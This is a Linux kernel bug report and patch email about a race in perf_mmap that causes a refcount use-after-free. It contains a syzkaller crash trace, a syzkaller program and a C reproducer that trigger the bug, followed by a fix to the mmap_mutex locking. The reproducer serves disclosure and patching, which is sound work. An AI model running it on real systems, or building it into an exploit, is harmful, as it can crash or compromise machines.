Zhejiang University
Syzkaller hit 'WARNING: refcount bug in perf_mmap' bug.
audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1
------------[ cut here ]------------
refcount_t: addition on 0; use-after-free.
WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Modules linked in:
CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary)
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25
Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f
RSP: 0018:ffff8881036bf678 EFLAGS: 00010286
RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c
RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000
RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c
R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000
R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0
FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0
PKRU: 55555554
Call Trace:
<TASK>
__refcount_add include/linux/refcount.h:289 [inline]
__refcount_inc include/linux/refcount.h:366 [inline]
refcount_inc include/linux/refcount.h:383 [inline]
perf_mmap_rb kernel/events/core.c:7005 [inline]
perf_mmap+0x126d/0x1990 kernel/events/core.c:7163
vfs_mmap include/linux/fs.h:2405 [inline]
mmap_file mm/internal.h:167 [inline]
__mmap_new_file_vma mm/vma.c:2413 [inline]
__mmap_new_vma mm/vma.c:2476 [inline]
__mmap_region+0xea5/0x2250 mm/vma.c:2670
mmap_region+0x267/0x350 mm/vma.c:2740
do_mmap+0x769/0xe50 mm/mmap.c:558
vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581
ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604
__do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline]
__se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline]
__x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f4a5add3b9d
Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d
RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000
RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000
R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000
R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0
</TASK>
---[ end trace 0000000000000000 ]---
Syzkaller reproducer:
# {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}}
pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 0x5, 0xffffffffffffffff)
r0 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, 0xffffffffffffffff, 0x8)
mmap(&(0x7f0000002000/0x1000)=nil, 0x1000, 0x0, 0x11, r0, 0x0)
r1 = perf_event_open(&(0x7f0000000000)={0x2, 0x80, 0x8, 0x1, 0x8, 0x1, 0x0, 0x2, 0x84143, 0x10, 0x1, 0x1, 0x1, 0x0, 0x0, 0x1, 0x1, 0x1, 0x0, 0x1, 0x0, 0x0, 0x0, 0x1, 0x0, 0x3, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x1, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x0, 0x0, 0x0, 0x7fff, 0x2, @perf_config_ext={0x29a, 0x8}, 0x1800, 0x7, 0x10000, 0x1, 0x4, 0xffffff7f, 0xfffe, 0x0, 0x8000003, 0x0, 0x7}, 0x0, 0x1, r0, 0x2)
mmap(&(0x7f0000186000/0x1000)=nil, 0x1000, 0x100000b, 0x13, r1, 0x0)
C reproducer:
// autogenerated by syzkaller (https://github.com/google/syzkaller)
#define _GNU_SOURCE
#include <endian.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>
#ifndef __NR_pkey_mprotect
#define __NR_pkey_mprotect 329
#endif
static __thread int clone_ongoing;
static __thread int skip_segv;
static __thread jmp_buf segv_env;
static void segv_handler(int sig, siginfo_t* info, void* ctx)
{
if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) {
exit(sig);
}
uintptr_t addr = (uintptr_t)info->si_addr;
const uintptr_t prog_start = 1 << 20;
const uintptr_t prog_end = 100 << 20;
int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0;
int valid = addr < prog_start || addr > prog_end;
if (skip && valid) {
_longjmp(segv_env, 1);
}
exit(sig);
}
static void install_segv_handler(void)
{
struct sigaction sa;
memset(&sa, 0, sizeof(sa));
sa.sa_handler = SIG_IGN;
syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8);
syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8);
memset(&sa, 0, sizeof(sa));
sa.sa_sigaction = segv_handler;
sa.sa_flags = SA_NODEFER | SA_SIGINFO;
sigaction(SIGSEGV, &sa, NULL);
sigaction(SIGBUS, &sa, NULL);
}
#define NONFAILING(...) \
({ \
int ok = 1; \
__atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
if (_setjmp(segv_env) == 0) { \
__VA_ARGS__; \
} else \
ok = 0; \
__atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
ok; \
})
#define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off))
#define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \
*(type*)(addr) = \
htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \
(((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len))))
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
int main(void)
{
syscall(__NR_mmap, /*addr=*/0x1ffffffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200000000000ul, /*len=*/0x1000000ul,
/*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
syscall(__NR_mmap, /*addr=*/0x200001000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul,
/*fd=*/(intptr_t)-1, /*offset=*/0ul);
const char* reason;
(void)reason;
install_segv_handler();
intptr_t res = 0;
if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
}
// pkey_mprotect arguments: [
// addr: VMA[0x2000]
// len: len = 0x2000 (8 bytes)
// prot: mmap_prot = 0x5 (8 bytes)
// key: pkey (resource)
// ]
syscall(__NR_pkey_mprotect, /*addr=*/0x200000000000ul, /*len=*/0x2000ul,
/*prot=PROT_READ|PROT_EXEC*/ 5ul, /*key=*/(intptr_t)-1);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x8 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/(intptr_t)-1,
/*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul);
if (res != -1)
r[0] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x0 (8 bytes)
// flags: mmap_flags = 0x11 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul,
/*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul);
// perf_event_open arguments: [
// attr: ptr[in, perf_event_attr] {
// perf_event_attr {
// type: perf_event_type = 0x2 (4 bytes)
// size: len = 0x80 (4 bytes)
// config0: int8 = 0x8 (1 bytes)
// config1: int8 = 0x1 (1 bytes)
// config2: int8 = 0x8 (1 bytes)
// config3: int8 = 0x1 (1 bytes)
// config4: const = 0x0 (4 bytes)
// sample_freq: int64 = 0x2 (8 bytes)
// sample_type: perf_sample_type = 0x84143 (8 bytes)
// read_format: perf_read_format = 0x10 (8 bytes)
// disabled: int64 = 0x1 (0 bytes)
// inherit: int64 = 0x1 (0 bytes)
// pinned: int64 = 0x1 (0 bytes)
// exclusive: int64 = 0x0 (0 bytes)
// exclude_user: int64 = 0x0 (0 bytes)
// exclude_kernel: int64 = 0x1 (0 bytes)
// exclude_hv: int64 = 0x1 (0 bytes)
// exclude_idle: int64 = 0x1 (0 bytes)
// mmap: int64 = 0x0 (0 bytes)
// comm: int64 = 0x1 (0 bytes)
// freq: int64 = 0x0 (0 bytes)
// inherit_stat: int64 = 0x0 (0 bytes)
// enable_on_exec: int64 = 0x0 (0 bytes)
// task: int64 = 0x1 (0 bytes)
// watermark: int64 = 0x0 (0 bytes)
// precise_ip: int64 = 0x3 (0 bytes)
// mmap_data: int64 = 0x1 (0 bytes)
// sample_id_all: int64 = 0x1 (0 bytes)
// exclude_host: int64 = 0x0 (0 bytes)
// exclude_guest: int64 = 0x0 (0 bytes)
// exclude_callchain_kernel: int64 = 0x1 (0 bytes)
// exclude_callchain_user: int64 = 0x0 (0 bytes)
// mmap2: int64 = 0x1 (0 bytes)
// comm_exec: int64 = 0x1 (0 bytes)
// use_clockid: int64 = 0x0 (0 bytes)
// context_switch: int64 = 0x0 (0 bytes)
// write_backward: int64 = 0x1 (0 bytes)
// namespaces: int64 = 0x0 (0 bytes)
// ksymbol: int64 = 0x0 (0 bytes)
// bpf_event: int64 = 0x1 (0 bytes)
// aux_output: int64 = 0x0 (0 bytes)
// cgroup: int64 = 0x0 (0 bytes)
// text_poke: int64 = 0x0 (0 bytes)
// build_id: int64 = 0x0 (0 bytes)
// inherit_thread: int64 = 0x1 (0 bytes)
// remove_on_exec: int64 = 0x0 (0 bytes)
// sigtrap: int64 = 0x0 (0 bytes)
// __reserved_1: const = 0x0 (8 bytes)
// wakeup_events: int32 = 0x7fff (4 bytes)
// bp_type: perf_bp_type = 0x2 (4 bytes)
// bp_config: union perf_bp_config {
// perf_config_ext: perf_config_ext {
// config1: int64 = 0x29a (8 bytes)
// config2: int64 = 0x8 (8 bytes)
// }
// }
// branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes)
// sample_regs_user: int64 = 0x7 (8 bytes)
// sample_stack_user: int32 = 0x10000 (4 bytes)
// clockid: clock_type = 0x1 (4 bytes)
// sample_regs_intr: int64 = 0x4 (8 bytes)
// aux_watermark: int32 = 0xffffff7f (4 bytes)
// sample_max_stack: int16 = 0xfffe (2 bytes)
// __reserved_2: const = 0x0 (2 bytes)
// aux_sample_size: int32 = 0x8000003 (4 bytes)
// __reserved_3: const = 0x0 (4 bytes)
// sig_data: int64 = 0x7 (8 bytes)
// }
// }
// pid: pid (resource)
// cpu: intptr = 0x1 (8 bytes)
// group: fd_perf (resource)
// flags: perf_flags = 0x2 (8 bytes)
// ]
// returns fd_perf
NONFAILING(*(uint32_t*)0x200000000000 = 2);
NONFAILING(*(uint32_t*)0x200000000004 = 0x80);
NONFAILING(*(uint8_t*)0x200000000008 = 8);
NONFAILING(*(uint8_t*)0x200000000009 = 1);
NONFAILING(*(uint8_t*)0x20000000000a = 8);
NONFAILING(*(uint8_t*)0x20000000000b = 1);
NONFAILING(*(uint32_t*)0x20000000000c = 0);
NONFAILING(*(uint64_t*)0x200000000010 = 2);
NONFAILING(*(uint64_t*)0x200000000018 = 0x84143);
NONFAILING(*(uint64_t*)0x200000000020 = 0x10);
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1));
NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26));
NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff);
NONFAILING(*(uint32_t*)0x200000000034 = 2);
NONFAILING(*(uint64_t*)0x200000000038 = 0x29a);
NONFAILING(*(uint64_t*)0x200000000040 = 8);
NONFAILING(*(uint64_t*)0x200000000048 = 0x1800);
NONFAILING(*(uint64_t*)0x200000000050 = 7);
NONFAILING(*(uint32_t*)0x200000000058 = 0x10000);
NONFAILING(*(uint32_t*)0x20000000005c = 1);
NONFAILING(*(uint64_t*)0x200000000060 = 4);
NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f);
NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe);
NONFAILING(*(uint16_t*)0x20000000006e = 0);
NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003);
NONFAILING(*(uint32_t*)0x200000000074 = 0);
NONFAILING(*(uint64_t*)0x200000000078 = 7);
res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0,
/*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul);
if (res != -1)
r[1] = res;
// mmap arguments: [
// addr: VMA[0x1000]
// len: len = 0x1000 (8 bytes)
// prot: mmap_prot = 0x100000b (8 bytes)
// flags: mmap_flags = 0x13 (8 bytes)
// fd: fd (resource)
// offset: intptr = 0x0 (8 bytes)
// ]
syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul,
/*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul,
/*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1],
/*offset=*/0ul);
return 0;
}
|
The issue is caused by a race condition between mmap() and event
teardown. In perf_mmap(), the ring_buffer (rb) is accessed via
map_range() after the mmap_mutex is released. If another thread
closes the event or detaches the buffer during this window, the
reference count of rb can drop to zero, leading to a UAF or
refcount saturation when map_range() or subsequent logic attempts
to use it.
Fix this by extending the scope of mmap_mutex to cover the entire
setup process, including map_range(), ensuring the buffer remains
valid until the mapping is complete.
Signed-off-by: Haocheng Yu <yuhaocheng035@gmail.com>
---
kernel/events/core.c | 42 +++++++++++++++++++++---------------------
1 file changed, 21 insertions(+), 21 deletions(-)
diff --git a/kernel/events/core.c b/kernel/events/core.c
index 2c35acc2722b..7c93f7d057cb 100644
--- a/kernel/events/core.c
+++ b/kernel/events/core.c
@@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
ret = perf_mmap_aux(vma, event, nr_pages);
if (ret)
return ret;
- }
-
- /*
- * Since pinned accounting is per vm we cannot allow fork() to copy our
- * vma.
- */
- vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
- vma->vm_ops = &perf_mmap_vmops;
- mapped = get_mapped(event, event_mapped);
- if (mapped)
- mapped(event, vma->vm_mm);
-
- /*
- * Try to map it into the page table. On fail, invoke
- * perf_mmap_close() to undo the above, as the callsite expects
- * full cleanup in this case and therefore does not invoke
- * vmops::close().
- */
- ret = map_range(event->rb, vma);
- if (ret)
- perf_mmap_close(vma);
+ /*
+ * Since pinned accounting is per vm we cannot allow fork() to copy our
+ * vma.
+ */
+ vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP);
+ vma->vm_ops = &perf_mmap_vmops;
+
+ mapped = get_mapped(event, event_mapped);
+ if (mapped)
+ mapped(event, vma->vm_mm);
+
+ /*
+ * Try to map it into the page table. On fail, invoke
+ * perf_mmap_close() to undo the above, as the callsite expects
+ * full cleanup in this case and therefore does not invoke
+ * vmops::close().
+ */
+ ret = map_range(event->rb, vma);
+ if (ret)
+ perf_mmap_close(vma);
+ }
return ret;
}
--
2.51.0
|
{
"author": "Haocheng Yu <yuhaocheng035@gmail.com>",
"date": "Sun, 1 Feb 2026 19:34:36 +0800",
